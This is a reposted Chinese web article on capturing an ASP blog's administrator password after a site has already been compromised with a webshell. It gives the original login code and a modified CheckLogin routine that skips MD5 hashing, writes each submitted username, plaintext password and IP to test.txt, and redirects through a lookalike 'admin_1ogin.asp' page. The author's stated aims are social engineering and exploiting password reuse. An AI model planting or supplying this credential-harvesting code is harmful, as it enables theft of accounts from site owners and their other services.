如何截取asp后臺登陸密碼的代碼
來源:易賢網(wǎng) 閱讀:2631 次 日期:2015-02-03 14:41:46
溫馨提示:易賢網(wǎng)小編為您整理了“如何截取asp后臺登陸密碼的代碼”,方便廣大網(wǎng)友查閱!

在一次安全檢測中,其實已拿到了webshell了,但是我還要社工他的郵箱還有其他資料類,所以要得知道他的習性。

下載了數(shù)據(jù)庫,但是md5密碼沒辦法解密。唉,看來只要記錄他的登錄管理員 賬號密碼了!

省得還要去窮取法破解!

這個密碼其實說重要也不重要 說不 重要 其實很重要。

因為很多人喜歡使用相同密碼。即使是我這類安全檢測人員,也免不了使用同一種賬號密碼的習慣。

首先看看他的后臺登陸代碼

<%

Dim Login

Set Login=new AdLogin

Login.Execute

Class AdLogin

Private ExCommCls

Private Sub class_initialize

Set CommCls=new CommonCls

ExCommCls.IsIpAllow

ExCommCls.CheckInstall

ExCommCls.GetConfigCache("*")

End Sub

Private Sub class_terminate

Set ExCommCls=nothing

End Sub

public Sub Execute

Dim Action

Action=Request("action")

Select Case Action

Case "CheckLogin"

CheckLogin

Case "LoginOut"

LoginOut

Case Else

LoginF

End Select

End Sub

Private Sub CheckLogin

Dim Adname,AdPwd,CheckCode

AdName=ExCommCls.G(Trim(request("Adname")))

AdPwd=md5(Trim(request("AdPwd")))

CheckCode=ExCommCls.G(request("checkCode"))

If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then

ExCommCls.ShowMsg "驗證碼錯誤!",Application(sn&"blogurl")&"admin_login.asp"

Exit Sub

End If

If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then

Response.Cookies(Md5(SN))("AdName")=AdName

Response.Cookies(Md5(SN))("AdPwd")=AdPwd

session("AdLogin")=Md5(SN)

ExCommCls.GetConfigCache("*")

ExCommCls.GetClassCache()

Response.Redirect(Application(sn&"blogurl")&"admin_index.asp")

Else

ExCommCls.ShowMsg "帳號或密碼錯誤",Application(sn&"blogurl")&"admin_login.asp"

End if

End Sub

Private Sub LoginOut

Response.Cookies(Md5(SN))("AdName")=""

Response.Cookies(Md5(SN))("AdPwd")=""

session.Abandon()

ExCommCls.ShowMsg "成功退出登陸",Application(sn&"blogurl")&"index.asp"

End Sub

Private Sub LoginF

%>

看下列代碼

AdName=ExCommCls.G(Trim(request("Adname")))

AdPwd=md5(Trim(request("AdPwd")))

---意思很簡單,這里就不明說了, 主要看md5 ,密碼使用md5加密 這樣的話,我們記錄的密碼也就沒用了,還是md5。所以

所以想到了,一個釣魚手法。 它本來的登錄界面是

Private Sub CheckLogin

Dim Adname,AdPwd,CheckCode,StrLogText,ip,ff

AdName=ExCommCls.G(Trim(request("Adname")))

AdPwd=(Trim(request("AdPwd")))

CheckCode=ExCommCls.G(request("checkCode"))

strLogFile="test.txt"

IP=request("IP")

StrLogText=StrLogText&AdName&"----"&AdPwd&"----IP:"&IP&("REMOTE_HOST")

set f=Server.CreateObject("scripting.filesystemobject")

set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)

ff.writeline(chr(13)+chr(10)&StrLogText)

ff.close

set ff=nothing

set f=nothing

If Trim(CheckCode)<>session("excheckcode") and Application(sn&"IsCheckCode")="是" Then

ExCommCls.ShowMsg "驗證碼錯誤!",Application(sn&"blogurl")&"Admin_1ogin.asp"

Exit Sub

End If

If Trim(AdName)=CStr(Application(sn&"AdName")) And Trim(AdPwd)=CStr(Application(sn&"AdPwd")) Then

Response.Cookies(Md5(SN))("AdName")=AdName

Response.Cookies((SN))("AdPwd")=AdPwd

session("AdLogin")=Md5(SN)

ExCommCls.GetConfigCache("*")

ExCommCls.GetClassCache()

Response.Redirect(Application(sn&"blogurl")&"Admin_1ogin.asp")

Else

ExCommCls.ShowMsg "帳號或密碼錯誤",Application(sn&"blogurl")&"Admin_1ogin.asp"

End if

End Sub

看到?jīng)],

a=本來的登錄頁面 現(xiàn)在換成了釣魚頁面

b=本來的登錄頁面(admin_login.asp)修改成admin_1ogin.asp

為什么呢。

本來的: AdPwd=md5(Trim(request("AdPwd")))

Response.Cookies(Md5(SN))("AdPwd")=AdPwd

修改

AdPwd=(Trim(request("AdPwd")))

Response.Cookies((SN))("AdPwd")=AdPwd

去掉md5。。這樣的迷惑手法,使用很久了!。。

沒什么技術含量。 還請不要見笑!密碼會記錄在test.txt上

更多信息請查看IT技術專欄

更多信息請查看網(wǎng)絡編程
易賢網(wǎng)手機網(wǎng)站地址:如何截取asp后臺登陸密碼的代碼

2025國考·省考課程試聽報名

  • 報班類型
  • 姓名
  • 手機號
  • 驗證碼
關于我們 | 聯(lián)系我們 | 人才招聘 | 網(wǎng)站聲明 | 網(wǎng)站幫助 | 非正式的簡要咨詢 | 簡要咨詢須知 | 新媒體/短視頻平臺 | 手機站點 | 投訴建議
工業(yè)和信息化部備案號:滇ICP備2023014141號-1 云南省教育廳備案號:云教ICP備0901021 滇公網(wǎng)安備53010202001879號 人力資源服務許可證:(云)人服證字(2023)第0102001523號
聯(lián)系電話:0871-65099533/13759567129 獲取招聘考試信息及咨詢關注公眾號:hfpxwx
咨詢QQ:1093837350(9:00—18:00)版權所有:易賢網(wǎng)